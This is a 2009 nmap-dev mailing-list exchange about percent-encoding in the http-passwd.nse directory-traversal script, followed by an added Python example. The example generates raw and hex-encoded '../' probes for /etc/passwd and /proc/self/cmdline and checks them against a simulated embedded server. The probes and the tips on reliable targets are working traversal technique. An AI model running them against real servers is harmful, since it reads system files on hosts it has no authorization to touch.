List:       nmap-dev
Subject:    Re: hexify() problem in http-passwd.nse
From:       Joao Correa <joao () livewire ! com ! br>
Date:       2009-05-31 20:49:17
Message-ID: 10a7d2ed0905311349p6e907eb9vc3476cf446b3e864 () mail ! gmail ! com

Thanks a lot Brandon!

Your 30 seconds answer was loud and clear!

On Sun, May 31, 2009 at 5:11 PM, Brandon Enright <bmenrigh@ucsd.edu> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Sun, 31 May 2009 16:47:31 -0300 or thereabouts Joao Correa
> <joao@livewire.com.br> wrote:
>
>> Kris, thanks for your answer and for the reference.
>>
>> My doubt is if, with the http-passwd.nse script, you are trying to
>> retrieve the passwd file directly, or if it is used to retrieve the
>> file as a parameter for the web application, just like described in
>> [1].
>>
>> Considering the source code I can only think about the first option,
>> but in this case we fall on the problem described on my first e-mail
>> (I've tried to reproduce the scenario here, but the hexed chars were
>> not decoded by the Apache, leading to failure). As mentioned before,
>> when I have removed the hexify function and sent the dir function
>> without special encoding, it worked fine. I don't think it is the
>> expected behavior.
>>
>> Since the script dates from 2007 and the mentioned RFC dates from
>> 2005, I don't believe that it is a problem of lost compatibility due
>> to Apache getting fit to the RFC.
>>
>> Have you used the script recently? Which web servers have you tried
>> to exploit?
>>
>> Thanks a lot,
>> João Correa
>>
>
> Hey João, sorry that I only have about 30 seconds to reply.  The
> directory traversal script really isn't targeted at mainstream
> webservers like Apache and IIS.  In some really heinous cases I suspect
> it would work against either, but it works pretty well against all of
> the hundreds of obscure webservers out there.
>
> For example, the ../../../etc/password works against the embedded HTTP
> server on many HTTP printers.  Never mind that it might violate RFC and
> best practices, it works on lots of servers.
>
> We might think of expanding the script beyond just /etc/password
> though.  I've seen a number of attacks recently that check for directory
> traversal by going after /proc/self/cmdline which seems to be more
> reliable than things like /etc/password
>
> Brandon
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v2.0.11 (GNU/Linux)
>
> iEYEARECAAYFAkoi5JMACgkQqaGPzAsl94ISUwCgvPQ4v+KcjozOTJsOFbF+O/Wx
> 6b4An3bwsbIZ8VpdbWOvnGl266fteeKY
> =OUnF
> -----END PGP SIGNATURE-----
>

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://SecLists.Org
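The thread turns on two practical points: a traversal probe sent as a percent-encoded "../" chain (%2E%2E%2F) only works if the target server decodes it before resolving the path, which obscure embedded servers often do and Apache did not in Joao's test; and /proc/self/cmdline is a useful second target because its NUL-separated argv is a stronger signature than a passwd file. The Python below is an added example written for this page, not the nmap http-passwd.nse script and not its hexify() (the hexify here is a stand-in that encodes only '.' and '/'). It generates raw and hex-encoded probes, confirms hits by signature rather than status code, and exercises them against a constructed fake embedded server that can be told whether or not it percent-decodes the URL path.

```python
"""Directory-traversal probing in the spirit of http-passwd.nse, rewritten
here in Python as an added example (not the nmap script, not its hexify()).
It builds plain and percent-encoded "../" request paths, sends them through
a caller-supplied fetch(path) -> bytes callable, and classifies the body by
a signature for /etc/passwd or /proc/self/cmdline. The fake embedded server
at the bottom is constructed for the demo.
"""
import re
from urllib.parse import unquote

# Signature that proves a body really is the file, not a 200 error page.
TARGETS = {
    # passwd: a root entry with uid 0 and gid 0
    "etc/passwd": re.compile(rb"^root:[^:]*:0:0:", re.M),
    # cmdline: argv strings, each NUL-terminated, and nothing else
    "proc/self/cmdline": re.compile(rb"\A[^\x00]+\x00(?:[^\x00]*\x00)*\Z"),
}


def hexify(s: str) -> str:
    """Percent-encode '.' and '/' (assumption: a stand-in, not nmap's hexify)."""
    return s.replace(".", "%2E").replace("/", "%2F")


def build_probes(target: str, max_depth: int = 8, encodings=("raw", "hex")):
    """Yield (encoding, path) for 1..max_depth levels of '../'."""
    for depth in range(1, max_depth + 1):
        traversal = "../" * depth + target
        if "raw" in encodings:
            yield "raw", "/" + traversal
        if "hex" in encodings:
            yield "hex", "/" + hexify(traversal)


def classify(body: bytes):
    """Name of the target whose signature matches the body, or None."""
    for name, sig in TARGETS.items():
        if sig.search(body):
            return name
    return None


def probe(fetch, max_depth: int = 8, encodings=("raw", "hex")):
    """Try every target/depth/encoding; return the first confirmed hit."""
    for target in TARGETS:
        for enc, path in build_probes(target, max_depth, encodings):
            body = fetch(path)
            if body is not None and classify(body) == target:
                return {"target": target, "encoding": enc, "path": path}
    return None


# --- constructed stand-in for an obscure embedded web server -------------
FAKE_FS = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n"
                   b"nobody:x:65534:65534:nobody:/:/bin/false\n",
    "/proc/self/cmdline": b"/bin/httpd\x00-p\x0080\x00",
}


def make_fake_server(decode_percent: bool, webroot=("var", "www", "html")):
    """Return fetch(path): joins the URL path onto the webroot without
    rejecting '..'. decode_percent=False models a server that leaves
    %2E%2E%2F untouched, so only a raw '../' chain escapes the root."""
    def fetch(path: str):
        p = unquote(path) if decode_percent else path
        stack = list(webroot)
        for seg in p.split("/"):
            if seg in ("", "."):
                continue
            if seg == "..":
                if stack:
                    stack.pop()
            else:
                stack.append(seg)
        return FAKE_FS.get("/" + "/".join(stack))
    return fetch


if __name__ == "__main__":
    for decode in (True, False):
        for enc in (("raw",), ("hex",)):
            print(f"decode_percent={decode} encodings={enc}: "
                  f"{probe(make_fake_server(decode), encodings=enc)}")
```

Against the server that does not decode percent-escapes, only the raw "../" chain gets a hit, which is the behaviour Joao reported once hexify was removed; against the decoding server both forms work. Matching on a signature is what keeps the probe honest against servers that answer every path with 200.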

